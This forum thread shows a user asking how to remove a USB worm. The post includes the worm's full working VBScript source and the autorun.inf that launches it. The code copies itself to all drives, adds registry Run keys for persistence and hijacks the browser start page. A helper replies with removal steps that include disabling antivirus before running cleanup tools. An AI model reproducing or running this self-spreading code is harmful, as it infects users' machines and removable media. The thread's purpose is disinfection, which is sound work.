Cannot Remove "autorun.inf" and "sys.dll.vbs"

[eugeneafable]

I have this problem in my Internal and External hardisk. Every time I double click it does not respond. When i right click my drive C it enables the "AutoPlay". I have the same problem with my External Hardisk it also enables the autoplay. I try to solve it and found out that this 2 mysterious autorun.inf and sys.dll.vbs save as a hidden file in the drive C and on my external hardisk. I open it with notepad it has a command lines for autorun.inf have the following text inside:



[autorun]
shellexecute=wscript.exe sys.dll.vbs


for this sys.dll.vbs it has the following text inside:


On Error Resume Next

Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd

mycmdfile = "cmd.exe"

mydate = month(now()) & day(now())
myvbsalias = "sys"
myvbsfile = myvbsalias & ".dll.vbs"

atr = "[autorun]" & vbCrLf & _
      "shellexecute=wscript.exe " & myvbsfile

Set fs = CreateObject("Scripting.FileSystemObject")

Dim mf, text, size

Set mf = fs.GetFile(WScript.ScriptFullname)

size = mf.size
check = mf.Drive.drivetype

Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream
   mysource = mysource & text.readline
   mysource = mysource & vbCrLf
Loop

Do
   Set winpath = fs.GetSpecialFolder(0)

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 32

   Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)

   tf.Write mysource
   tf.Close

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 39

  For Each flashdrive In fs.drives
      If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True)

         tf.Write mysource
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 39

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True)

         tf.Write atr
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 39
      End If
   Next

   Set rg = CreateObject("WScript.Shell")

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ""
   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.porntube.com/"

   rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig", winpath & "\" & myvbsfile
   rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig", winpath & "\" & myvbsfile


   If check <> 1 Then
      WScript.sleep 200000
   End If

Loop While (check <> 1)

Set sd = CreateObject("WScript.Shell")

sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname



both are saved in drive C or in my hardisk.

I want to remove this file. 

Thanks a lot
eugene

P.S: Do not copy this file and save it with an extension file of .inf and .vbs this will give you headache.

Following problems created:
1. autoplay in hardisk
2. internet explorer homepage changed to porntube
3. It copies itself and transferred to other hardisk or flashdrive.

[essexboy]

Hi I have two programmes for you to run which should clear it

First one to delete from your main hard drive and the other to remove from the eternal and any flash drives you use


Please download ComboFix from Here or Here to your Desktop.

**Note:  In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**

• Please, never rename Combofix unless instructed.
• Close any open browsers.
• Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

-----------------------------------------------------------

• Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  
• Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.[/color]
  
  -----------------------------------------------------------

• Close any open browsers.
• WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
  
• Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
• If there is no internet connection after running Combofix, then restart your computer to restore back your connection.

-----------------------------------------------------------

• Double click on combofix.exe & follow the prompts.
  
• When finished, it will produce a report for you. 
• Please post the "C:\ComboFix.txt" along with a new HijackThis log for further review.
  

**Note: Do not mouseclick combofix's window while it's running. That may cause it to stall**

THEN

1 - Flash Drive Disinfector
Download Flash_Disinfector.exe by sUBs from >here< and save it to your desktop.

• Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
• The utility may ask you to insert your flash drive and/or other removable drives including your mobile phone. Please do so and allow the utility to clean up those drives as well.
• Wait until it has finished scanning and then exit the program.
• Reboot your computer when done.

Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.[/list]

[eugeneafable]

Thank you very much Mr essexboy!!!

By the way, the properties of this two executable files are similar to a virus. Why Avast do not consider this autorun.inf and sys.dll.vbs as a virus? Can i send this problem to avast for them to include in their updates.

Thank you again
eugene